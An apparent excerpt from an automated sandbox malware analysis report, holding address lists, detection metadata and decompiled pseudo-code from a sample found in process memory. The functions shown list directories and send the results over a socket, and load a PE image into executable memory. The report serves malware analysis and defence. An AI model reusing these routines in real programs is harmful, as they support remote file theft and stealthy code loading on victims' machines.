                0x00452d83
                0x004531e7
                0x004531f1
                0x004531f2
                0x004531f8
                0x004531fa
                0x00453663
                0x00453665
                0x00453667
                0x0045366d
                0x0045366f
                0x00453675
                0x00453677
                0x004539c9
                0x004539c9
                0x004539cb
                0x004539d1
                0x004539d8
                0x004539de
                0x004539e0
                0x00453a7e
                0x00453a7e
                0x00453a80
                0x00453a81
                0x00453a87
                0x00000000
                0x004539e6
                0x004539e6
                0x004539e9
                0x004539ef
                0x004539f5
                0x004539f7
                0x004539fd
                0x004539ff
                0x004539ff
                0x00453a01
                0x00453a01
                0x00453a0a
                0x00453a11
                0x00453a17
                0x00453a1a
                0x00453a1b
                0x00453a1d
                0x00453a1d
                0x00453a21
                0x00453a23
                0x00453a25
                0x00453a2b
                0x00453a2e
                0x00000000
                0x00453a30
                0x00453a30
                0x00453a37
                0x00453a37
                0x00453a2e
                0x00453a23
                0x004539f7
                0x004539e9
                0x004539e0
                0x0045367d
                0x0045367d
                0x0045367d
                0x00453680
                0x00453684
                0x00453684
                0x00453685
                0x00453697
                0x004536a4
                0x004536b3
                0x004536dd
                0x004536e2
                0x004536e8
                0x004536eb
                0x004536f1
                0x004536f4
                0x0045378d
                0x00453794
                0x00453812
                0x00453818
                0x0045381e
                0x00453821
                0x00453823
                0x004538ac
                0x00453829
                0x00453829
                0x0045382f
                0x0045382f
                0x00453835
                0x0045383b
                0x0045383d
                0x0045383f
                0x0045383f
                0x00453845
                0x0045384b
                0x0045384d
                0x00453855
                0x00453855
                0x0045385b
                0x0045385d
                0x0045385f
                0x00453865
                0x00453867
                0x0045397e
                0x00453980
                0x00453986
                0x00453986
                0x00453989
                0x0045398a
                0x00000000
                0x0045386d
                0x00453873
                0x00453873
                0x00453875
                0x0045387b
                0x0045387e
                0x00453885
                0x0045388b
                0x0045388d
                0x004538b4
                0x004538b6
                0x004538b8
                0x004538ba
                0x004538c0
                0x004538c6
                0x00453960
                0x00453960
                0x00453963
                0x00000000
                0x00453969
                0x00453969
                0x0045396f
                0x00000000
                0x0045396f
                0x004538cc
                0x004538cc
                0x004538cc
                0x004538cf
                0x00000000
                0x00000000
                0x004538d1
                0x004538d3
                0x004538d5
                0x004538de
                0x004538de
                0x004538e0
                0x004538e6
                0x004538e6
                0x004538f2
                0x004538fd
                0x00453900
                0x0045390d
                0x00453910
                0x00453911
                0x00453912
                0x00453918
                0x0045391a
                0x00453920
                0x00453926
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00453928
                0x00453928
                0x00453928
                0x0045392a
                0x00000000
                0x00000000
                0x0045392c
                0x0045392f
                0x00000000
                0x00453935
                0x00453935
                0x00453937
                0x00453939
                0x00453939
                0x00453939
                0x00453941
                0x00453944
                0x00453944
                0x0045394a
                0x0045394c
                0x0045394e
                0x00453955
                0x0045395b
                0x0045395d
                0x00000000
                0x0045395d
                0x00000000
                0x0045392f
                0x00000000
                0x00453928
                0x00000000
                0x004538cc
                0x0045388f
                0x0045388f
                0x00453891
                0x00453897
                0x0045389e
                0x0045389e
                0x004538a1
                0x004538a1
                0x00000000
                0x00453891
                0x00000000
                0x00453975
                0x00453975
                0x00453976
                0x00453976
                0x00000000
                0x0045387b
                0x00453796
                0x00453796
                0x004537a1
                0x004537a8
                0x004537ae
                0x004537b5
                0x004537b6
                0x004537b7
                0x004537bc
                0x004537bf
                0x004537c1
                0x00000000
                0x004537c7
                0x004537c7
                0x004537ca
                0x00000000
                0x004537d0
                0x004537d0
                0x004537d7
                0x00000000
                0x004537dd
                0x004537e3
                0x004537e5
                0x004537eb
                0x004537eb
                0x004537ed
                0x004537ed
                0x004537ef
                0x004537f8
                0x004537ff
                0x00453802
                0x00453803
                0x00453805
                0x00453805
                0x00000000
                0x0045380d
                0x004537d7
                0x004537ca
                0x004537c1
                0x004536fa
                0x004536fa
                0x00453700
                0x00453702
                0x0045371e
                0x00453721
                0x00000000
                0x00453727
                0x00453727
                0x0045372e
                0x00000000
                0x00453734
                0x0045373a
                0x0045373c
                0x00453742
                0x00453742
                0x00453744
                0x00453744
                0x00453746
                0x0045374f
                0x00453756
                0x00453759
                0x0045375a
                0x0045375c
                0x0045375c
                0x00453764
                0x00453764
                0x00453766
                0x00000000
                0x0045376c
                0x0045376c
                0x00453772
                0x00453775
                0x00453a3f
                0x00453a41
                0x00453a42
                0x00453a48
                0x00453a54
                0x00453a5b
                0x00453a5c
                0x00453a5d
                0x00453a62
                0x00453a65
                0x0045377b
                0x0045377b
                0x00453782
                0x00000000
                0x00453782
                0x00453775
                0x00453766
                0x0045372e
                0x00453704
                0x00453704
                0x00453706
                0x0045370c
                0x00453712
                0x00453713
                0x00453990
                0x00453990
                0x00453997
                0x00453998
                0x00453999
                0x0045399e
                0x004539a1
                0x004539a1
                0x004539a1
                0x00453702
                0x004539a3
                0x004539a3
                0x004539a5
                0x00453a6c
                0x00453a73
                0x00453a7a
                0x00453a8d
                0x00453a93
                0x00453a94
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004539ab
                0x004539b1
                0x004539b1
                0x004539b7
                0x004539b7
                0x004539c3
                0x00000000
                0x004539c3
                0x00453200
                0x00453200
                0x00453202
                0x00453208
                0x0045320a
                0x00453210
                0x00453212
                0x00453589
                0x00453589
                0x0045358b
                0x00453591
                0x00453598
                0x0045359a
                0x004535f9
                0x004535fc
                0x00453602
                0x00453608
                0x0045360e
                0x00453610
                0x00453616
                0x00453618
                0x00453618
                0x0045361a
                0x0045361a
                0x0045361c
                0x00453625
                0x0045362c
                0x0045362f
                0x00453630
                0x00453632
                0x00453632
                0x0045363a
                0x0045363c
                0x00453642
                0x00453648
                0x0045364b
                0x00000000
                0x00453651
                0x00453651
                0x00453658
                0x00453658
                0x0045364b
                0x0045363c
                0x00453610
                0x0045359c
                0x0045359c
                0x0045359e
                0x004535a4
                0x004535aa
                0x00000000
                0x004535aa
                0x0045359a
                0x00453218
                0x00453218
                0x00453218
                0x0045321b
                0x0045321f
                0x0045321f
                0x00453220
                0x00453232
                0x0045323f
                0x0045324e
                0x00453278
                0x0045327d
                0x00453283
                0x00453286
                0x0045328c
                0x0045328f
                0x0045330b
                0x00453312
                0x004533d6
                0x004533dc
                0x004533e2
                0x004533e5
                0x004533e7
                0x00453470
                0x004533ed
                0x004533ed
                0x004533f3
                0x004533f3
                0x004533f9
                0x004533ff
                0x00453401
                0x00453403
                0x00453403
                0x00453409
                0x0045340f
                0x00453411
                0x00453419
                0x00453419
                0x0045341f
                0x00453421
                0x00453423
                0x00453429
                0x0045342b
                0x00453542
                0x00453544
                0x0045354a
                0x0045354a
                0x00000000
                0x00453431
                0x00453437
                0x00453437
                0x00453439
                0x0045343f
                0x00453442
                0x00453449
                0x0045344f
                0x00453451
                0x00453478
                0x0045347a
                0x0045347c
                0x0045347e
                0x00453484
                0x0045348a
                0x00453524
                0x00453524
                0x00453527
                0x00000000
                0x0045352d
                0x0045352d
                0x00453533
                0x00000000
                0x00453533
                0x00453490
                0x00453490
                0x00453490
                0x00453493
                0x00000000
                0x00000000
                0x00453495
                0x00453497
                0x00453499
                0x004534a2
                0x004534a2
                0x004534a4
                0x004534aa
                0x004534aa
                0x004534b6
                0x004534c1
                0x004534c4
                0x004534d1
                0x004534d4
                0x004534d5
                0x004534d6
                0x004534dc
                0x004534de
                0x004534e4
                0x004534ea
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004534ec
                0x004534ec
                0x004534ec
                0x004534ee
                0x00000000
                0x00000000
                0x004534f0
                0x004534f3
                0x004535ad
                0x004535ad
                0x004535af
                0x004535b5
                0x004535bb
                0x004535bc
                0x00000000
                0x004534f9
                0x004534f9
                0x004534fb
                0x004534fd
                0x004534fd
                0x004534fd
                0x00453505
                0x00453508
                0x00453508
                0x0045350e
                0x00453510
                0x00453512
                0x00453519
                0x0045351f
                0x00453521
                0x00000000
                0x00453521
                0x00000000
                0x004534f3
                0x00000000
                0x004534ec
                0x00000000
                0x00453490
                0x00453453
                0x00453453
                0x00453455
                0x0045345b
                0x00453462
                0x00453462
                0x00453465
                0x00453465
                0x00000000
                0x00453455
                0x00000000
                0x00453539
                0x00453539
                0x0045353a
                0x0045353a
                0x00000000
                0x0045343f
                0x00453318
                0x00453318
                0x00453323
                0x0045332a
                0x00453330
                0x00453337
                0x00453338
                0x00453339
                0x0045333e
                0x00453341
                0x00453343
                0x0045335f
                0x00453362
                0x00000000
                0x00453368
                0x00453368
                0x0045336f
                0x00000000
                0x00453375
                0x0045337b
                0x0045337d
                0x00453383
                0x00453383
                0x00453385
                0x00453385
                0x00453387
                0x00453390
                0x00453397
                0x0045339a
                0x0045339b
                0x0045339d
                0x0045339d
                0x00000000
                0x00453385
                0x0045336f
                0x00453345
                0x00453347
                0x0045334d
                0x00453353
                0x00453354
                0x00000000
                0x00453354
                0x00453343
                0x00453291
                0x00453291
                0x00453297
                0x00453299
                0x004532ae
                0x004532b1
                0x00000000
                0x004532b7
                0x004532b7
                0x004532be
                0x00000000
                0x004532c4
                0x004532ca
                0x004532cc
                0x004532d2
                0x004532d2
                0x004532d4
                0x004532d4
                0x004532d6
                0x004532df
                0x004532e6
                0x004532e9
                0x004532ea
                0x004532ec
                0x004532ec
                0x004533a5
                0x004533a5
                0x004533a7
                0x00000000
                0x004533ad
                0x004533ad
                0x004533b3
                0x004533b6
                0x004532f9
                0x00453300
                0x00000000
                0x004533bc
                0x004533be
                0x004533c4
                0x004533ca
                0x004533cb
                0x004535c2
                0x004535c2
                0x004535c9
                0x004535ca
                0x004535cb
                0x004535d0
                0x004535d3
                0x004535d3
                0x004533b6
                0x004533a7
                0x004532be
                0x0045329b
                0x0045329b
                0x0045329d
                0x004532a3
                0x0045354d
                0x0045354d
                0x0045354e
                0x00453554
                0x00453554
                0x0045355b
                0x0045355c
                0x0045355d
                0x00453562
                0x00453565
                0x00453565
                0x00453565
                0x00453299
                0x00453567
                0x00453567
                0x00453569
                0x004535d7
                0x004535de
                0x004535de
                0x004535de
                0x004535e5
                0x004535e7
                0x004535ed
                0x004535ee
                0x00453a9a
                0x00453a9a
                0x00453a9b
                0x00453a9c
                0x00453aa1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0045356b
                0x00453571
                0x00453571
                0x00453577
                0x00453577
                0x00453583
                0x00000000
                0x00453583
                0x00453212
                0x00453aa4
                0x00453aa4
                0x00453aaa
                0x00453aac
                0x00453ab2
                0x00453ab8
                0x00453aba
                0x00453abc
                0x00453abe
                0x00453abe
                0x00453ac0
                0x00453ac0
                0x00453ac9
                0x00453aca
                0x00453ace
                0x00453ad5
                0x00453ad8
                0x00453ad9
                0x00453adb
                0x00453adb
                0x00453adf
                0x00453ae5
                0x00453ae7
                0x00453aed
                0x00453aef
                0x00453af5
                0x00453af8
                0x00453b0b
                0x00453b0d
                0x00453b0e
                0x00453b14
                0x00453b20
                0x00453b27
                0x00453b28
                0x00453b29
                0x00453b2e
                0x00453afa
                0x00453afc
                0x00453b03
                0x00453b03
                0x00453af8
                0x00453b31
                0x00453b31
                0x00453b41
                0x00453b4a
                0x00453b4b
                0x00453b4d
                0x00453be4
                0x00453be6
                0x00453bf1
                0x00453bf1
                0x00453bf3
                0x00453bf6
                0x00453bf8
                0x00000000
                0x00453be8
                0x00453bee
                0x00453bee
                0x00453b53
                0x00453b53
                0x00453b59
                0x00453b5c
                0x00453b62
                0x00453b65
                0x00453b6b
                0x00453b6d
                0x00453b73
                0x00453b75
                0x00453b77
                0x00453b77
                0x00453b79
                0x00453b79
                0x00453b86
                0x00453b8d
                0x00453b90
                0x00453b91
                0x00453b93
                0x00453b94
                0x00453b94
                0x00453b98
                0x00453b9e
                0x00453ba0
                0x00453ba2
                0x00453ba8
                0x00453bab
                0x00453bbe
                0x00453bbf
                0x00453bc5
                0x00453bd1
                0x00453bd8
                0x00453bd9
                0x00453bda
                0x00453bdf
                0x00453bad
                0x00453bad
                0x00453bb4
                0x00453bb4
                0x00453bab
                0x00453ba0
                0x00453bfe
                0x00453bfe
                0x00453bfe
                0x00453c0a
                0x00453c0d
                0x00453c13
                0x00453c15
                0x00453c17
                0x00453c1d
                0x00453c1f
                0x00453c1f
                0x00453c1f
                0x00453c1d
                0x00453c24
                0x00453c25
                0x00453c27
                0x00453c29
                0x00453c29
                0x00453c2b
                0x00453c31
                0x00453c37
                0x00453c39
                0x00453c3f
                0x00453c3f
                0x00453c45
                0x00453c47
                0x00000000
                0x00000000
                0x00453c4d
                0x00453c4f
                0x00453c51
                0x00453c51
                0x00453c53
                0x00453c53
                0x00453c63
                0x00453c6a
                0x00453c6d
                0x00453c6e
                0x00453c70
                0x00453c70
                0x00453c74
                0x00453c7a
                0x00453c7c
                0x00453c7e
                0x00453c84
                0x00453c87
                0x00453c98
                0x00453c9a
                0x00453c9b
                0x00453ca1
                0x00453cad
                0x00453cb4
                0x00453cb5
                0x00453cb6
                0x00453cbb
                0x00453c89
                0x00453c89
                0x00453c90
                0x00453c90
                0x00453c87
                0x00453ccc
                0x00453cdb
                0x00453cdc
                0x00453cdc
                0x00453cde
                0x00453ce0
                0x00453ce0
                0x00453ce6
                0x00453ce9
                0x00453ceb
                0x00453ced
                0x00453ced
                0x00453cf0
                0x00453cf1
                0x00453cf1
                0x00453cf6
                0x00453cf9
                0x00453cfd
                0x00453cfd
                0x00453cfe
                0x00453d00
                0x00453d06
                0x00453d0c
                0x00000000
                0x00000000
                0x00000000
                0x00453d0c
                0x00453c3f
                0x00453d12
                0x00453d12
                0x00000000
                0x00453d12
                0x00452a97
                0x00452a8e
                0x00452a85
                0x00452a3c
                0x00452a40
                0x00452a48
                0x00000000
                0x00452a4a
                0x00452a50
                0x00452a55
                0x00453d31
                0x00453d31
                0x00453d34
                0x00453d3f
                0x00453d6a
                0x00453d6b
                0x00453d6c
                0x00453d6d
                0x00453d6e
                0x00453d6f
                0x00453d74
                0x00453d77
                0x00453d7a
                0x00453d7b
                0x00453d7e
                0x00453d80
                0x00453d86
                0x00453d89
                0x00453d8b
                0x00453da0
                0x00453da1
                0x00453da4
                0x00453da6
                0x00453dbc
                0x00453dc2
                0x00453dca
                0x00453dcc
                0x00453dd7
                0x00453dda
                0x00453df1
                0x00453ddc
                0x00453ddc
                0x00453de1
                0x00000000
                0x00453de1
                0x00453dce
                0x00453dce
                0x00453dd3
                0x00453de3
                0x00453de3
                0x00453de4
                0x00453de6
                0x00453deb
                0x00453deb
                0x00453da8
                0x00453da8
                0x00453dab
                0x00000000
                0x00453dad
                0x00453db0
                0x00453db8
                0x00453db8
                0x00453dab
                0x00453d8d
                0x00453d8d
                0x00453d94
                0x00453d95
                0x00453d97
                0x00453d9c
                0x00453d9c
                0x00453d82
                0x00453d82
                0x00453d82
                0x00453df5
                0x00453d41
                0x00453d41
                0x00453d41
                0x00453d4b
                0x00453d54
                0x00453d59
                0x00453d67
                0x00453d67
                0x00453d3f
                0x00452a48

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 66c88f94bcf76d92480bef0de8e75354ac52460a1e4e9baaabc3b75a61576d9a
                • Instruction ID: ab5b192c1b67bfb1c49c02c59f66a0540b606f502e9411ba0412ed8ffb88480c
                • Opcode Fuzzy Hash: 66c88f94bcf76d92480bef0de8e75354ac52460a1e4e9baaabc3b75a61576d9a
                • Instruction Fuzzy Hash: B7C27D71E046288FDB25CE28DD407EAB3B5EB45346F1441EBD80DE7242E778AE898F45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408909 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00408909(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t101;
				intOrPtr* _t106;
				signed int _t116;
				void* _t128;
				void* _t149;
				void* _t152;
				signed int _t154;
				signed int _t167;
				signed int _t180;
				signed int _t182;
				void* _t265;
				void* _t267;
				void* _t273;
				void* _t275;
				intOrPtr _t276;
				void* _t277;
				void* _t280;

				_t182 = __ecx;
				E00456328(E00456703, _t273);
				_t276 = _t275 - 0x300;
				_push(_t265);
				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
				_t180 = _t182;
				 *(_t273 - 0x18) = _t180;
				E004020BF(_t180, _t273 - 0x9c);
				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
				 *_t180 = 0;
				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
				_t260 = _t180 + 4;
				E0040480D(_t180 + 4);
				_t101 = E004048A8(_t180 + 4, _t265, _t180 + 4);
				_t282 = _t101;
				if(_t101 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t276 = _t276 - 0x18;
					_t258 = E00402F11(_t273 - 0x6c, _t273 + 0x38, _t273, 0x472ec8);
					E00402EF0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
					_push(0x64);
					_t180 = _t180 & 0xffffff00 | E00404A81(_t260, _t174, _t282) == 0xffffffff;
					E00401FB8();
					if(_t180 != 0) {
						E00404E06(_t258);
						 *((intOrPtr*)(_t273 - 0x20)) = 1;
						_push(0x46ccd0);
						_t152 = _t273 - 0x20;
						L3:
						_push(_t152);
						L4:
						E004379F6();
					}
				}
				_t261 = E004022E5(_t273 + 0x20, _t273 - 0x30);
				_t106 = E004022AA(_t273 + 0x20, _t273 - 0x34);
				E00409291(_t273 - 0x3c,  *((intOrPtr*)(E004022E5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
				_t277 = _t276 + 0xc;
				_t252 = _t273 + 8;
				_t267 = FindFirstFileW(E00401EE4(E004087F0(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
				 *(_t273 - 0x1c) = _t267;
				E00401EE9();
				_t285 = _t267 - 0xffffffff;
				if(_t267 != 0xffffffff) {
					goto L7;
				} else {
					_t276 = _t277 - 0x18;
					E00402073(_t180, _t276, _t252, _t273, 0x464074);
					_push(0x65);
					E00404A81( *(_t273 - 0x18) + 4, _t252, _t285);
					E00404E06(_t252);
					 *((intOrPtr*)(_t273 - 0x24)) = 2;
					_push(0x46ccd0);
					_t152 = _t273 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t116 = FindNextFileW(_t267, _t273 - 0x304);
					__eflags = _t116;
					if(_t116 == 0) {
						break;
					}
					_t180 =  *(_t273 - 0x18);
					__eflags =  *_t180;
					if( *_t180 == 0) {
						__eflags =  *(_t273 - 0x304) & 0x00000010;
						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
							L17:
							E0040415E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
							_t261 = E004022E5(_t273 - 0x84, _t273 - 0x3c);
							_t270 = E004022AA(_t273 - 0x84, _t273 - 0x38);
							E00409291(_t273 - 0x30,  *((intOrPtr*)(E004022E5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
							_t277 = _t277 + 0xc;
							__eflags = E00409114(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L20:
								E00401EE9();
								_t267 =  *(_t273 - 0x1c);
								continue;
							} else {
								E00401FC2(_t273 - 0x9c, _t252, _t270, E00402097(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
								E00401FB8();
								_t277 = _t277 - 0x18;
								_t252 = E00402EF0(_t180, _t273 - 0x54, E0041A879(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x472ec8);
								E00402EF0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
								_push(0x66);
								_t149 = E00404A81(_t180 + 4, _t147, __eflags);
								__eflags = _t149 - 0xffffffff;
								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
								E00401FB8();
								E00401FB8();
								__eflags = _t180;
								if(_t180 == 0) {
									goto L20;
								} else {
									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
									_push(0x46ccd0);
									_t152 = _t273 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t154 = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, 0x4644f0);
							__eflags = _t154;
							if(_t154 == 0) {
								goto L17;
							} else {
								__eflags = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
								if(__eflags == 0) {
									goto L17;
								} else {
									_t252 = E00408876(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040415E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
									E00402FF4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
									E00401EE9();
									E00401EE9();
									_t280 = _t277 - 0x18;
									E004086D0(_t180, _t280, _t159, __eflags, _t273 + 0x20);
									_t277 = _t280 - 0x18;
									E004086D0(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
									_t167 = E00408D1B(_t180, _t159, __eflags);
									__eflags = _t167;
									if(_t167 != 0) {
										E00401EE9();
										goto L17;
									} else {
										 *((intOrPtr*)(_t273 - 0x28)) = 3;
										_push(0x46ccd0);
										_t152 = _t273 - 0x28;
										goto L3;
									}
								}
							}
						}
						L23:
						E00401FB8();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						_t128 = E00401FB8();
						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
						return _t128;
					} else {
						FindClose(_t267);
					}
					L10:
					E00404E06(_t252);
					goto L23;
				}
				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
				FindClose(_t267);
				_t252 = E00402F11(_t273 - 0x54, _t273 + 0x38, _t273, 0x472ec8);
				E00402EF0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
				_push(0x67);
				E00404A81( *(_t273 - 0x18) + 4, _t119, __eflags);
				E00401FB8();
				goto L10;
			}























                0x00408909
                0x0040890e
                0x00408913
                0x0040891a
                0x0040891c
                0x0040891f
                0x00408921
                0x0040892a
                0x0040892f
                0x00408933
                0x00408936
                0x0040893a
                0x0040893f
                0x00408947
                0x0040894c
                0x0040894e
                0x00408cb6
                0x00408cb8
                0x00000000
                0x00408954
                0x00408954
                0x0040896e
                0x00408972
                0x00408978
                0x00408984
                0x0040898a
                0x00408991
                0x00408995
                0x0040899a
                0x004089a1
                0x004089a6
                0x004089a9
                0x004089a9
                0x004089aa
                0x004089aa
                0x004089aa
                0x00408991
                0x004089bb
                0x004089c4
                0x004089e0
                0x004089e5
                0x004089f4
                0x00408a0e
                0x00408a10
                0x00408a16
                0x00408a1b
                0x00408a1e
                0x00000000
                0x00408a20
                0x00408a20
                0x00408a2a
                0x00408a2f
                0x00408a37
                0x00408a3f
                0x00408a44
                0x00408a4b
                0x00408a50
                0x00000000
                0x00408a50
                0x00408a58
                0x00408a58
                0x00408a60
                0x00408a66
                0x00408a68
                0x00000000
                0x00000000
                0x00408a6e
                0x00408a71
                0x00408a74
                0x00408a8a
                0x00408a91
                0x00408b52
                0x00408b5f
                0x00408b73
                0x00408b84
                0x00408b9e
                0x00408ba3
                0x00408bb7
                0x00408bba
                0x00408c57
                0x00408c5d
                0x00408c62
                0x00000000
                0x00408bc0
                0x00408bdb
                0x00408be3
                0x00408be8
                0x00408c12
                0x00408c16
                0x00408c1c
                0x00408c21
                0x00408c26
                0x00408c29
                0x00408c2f
                0x00408c3a
                0x00408c3f
                0x00408c41
                0x00000000
                0x00408c43
                0x00408c43
                0x00408c4a
                0x00408c4f
                0x00000000
                0x00408c4f
                0x00408c41
                0x00408a97
                0x00408aa3
                0x00408aaa
                0x00408aac
                0x00000000
                0x00408ab2
                0x00408ac5
                0x00408ac7
                0x00000000
                0x00408acd
                0x00408af1
                0x00408af6
                0x00408b02
                0x00408b0a
                0x00408b0f
                0x00408b18
                0x00408b1d
                0x00408b26
                0x00408b2d
                0x00408b32
                0x00408b34
                0x00408b4d
                0x00000000
                0x00408b36
                0x00408b36
                0x00408b3d
                0x00408b42
                0x00000000
                0x00408b42
                0x00408b34
                0x00408ac7
                0x00408aac
                0x00408cdd
                0x00408ce3
                0x00408ceb
                0x00408cf3
                0x00408cfb
                0x00408d03
                0x00408d0b
                0x00408d18
                0x00408a76
                0x00408a77
                0x00408a7d
                0x00408a80
                0x00408a80
                0x00000000
                0x00408a80
                0x00408c6a
                0x00408c6f
                0x00408c92
                0x00408c96
                0x00408c9c
                0x00408ca1
                0x00408ca9
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 0040890E
                  • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • __CxxThrowException@8.LIBVCRUNTIME ref: 004089AA
                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A08
                • FindNextFileW.KERNEL32(00000000,?), ref: 00408A60
                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408A77
                  • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                  • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                  • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                • FindClose.KERNEL32(00000000), ref: 00408C6F
                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                • String ID:
                • API String ID: 1824512719-0
                • Opcode ID: f65f91661afe7f647343ce44d55ee458c5554bda9336a5833d0de8d2a30ad031
                • Instruction ID: d8a72a11d5b22176fcc9823f728123f790ce651a5e6d51f59b88b1622e7f2630
                • Opcode Fuzzy Hash: f65f91661afe7f647343ce44d55ee458c5554bda9336a5833d0de8d2a30ad031
                • Instruction Fuzzy Hash: F1B17D729001099BCB14FBA1DD96AEDB378AF40318F50417FF506B61D2EF386A49CB99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00411241 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00411241(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t52;
				signed int _t55;
				void* _t58;
				signed int _t66;
				signed int _t68;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				void* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t104;
				void* _t106;
				signed int _t109;
				void* _t115;
				void* _t116;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t123;
				signed int _t126;
				void* _t127;
				void* _t128;

				_t106 = 0x40;
				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
				_t119 = 0;
				if(E00410CDF(__edx, _t106) != 0) {
					__eflags =  *__ecx - 0x5a4d;
					if( *__ecx == 0x5a4d) {
						_t52 = E00410CDF(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
						__eflags = _t52;
						if(_t52 == 0) {
							goto L1;
						}
						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
						__eflags =  *_t90 - 0x4550;
						if( *_t90 != 0x4550) {
							goto L3;
						}
						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
							goto L3;
						}
						__eflags =  *(_t90 + 0x38) & 0x00000001;
						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
							goto L3;
						}
						_t109 =  *(_t90 + 6) & 0x0000ffff;
						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
						__eflags = _t109;
						if(_t109 == 0) {
							L14:
							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
							_t116 = E00410CCE( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
							_t58 = E00410CCE(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
							__eflags = _t116 - _t58;
							if(_t116 == _t58) {
								_push(0);
								_t126 = E004111E6( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 0x40);
								_t128 = _t127 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									L20:
									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
									__eflags = _t117;
									if(_t117 != 0) {
										 *(_t117 + 4) = _t126;
										 *((intOrPtr*)(_t117 + 0x1c)) = E004111E6;
										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
										 *((intOrPtr*)(_t117 + 0x20)) = E004111FD;
										 *((intOrPtr*)(_t117 + 0x24)) = E00411210;
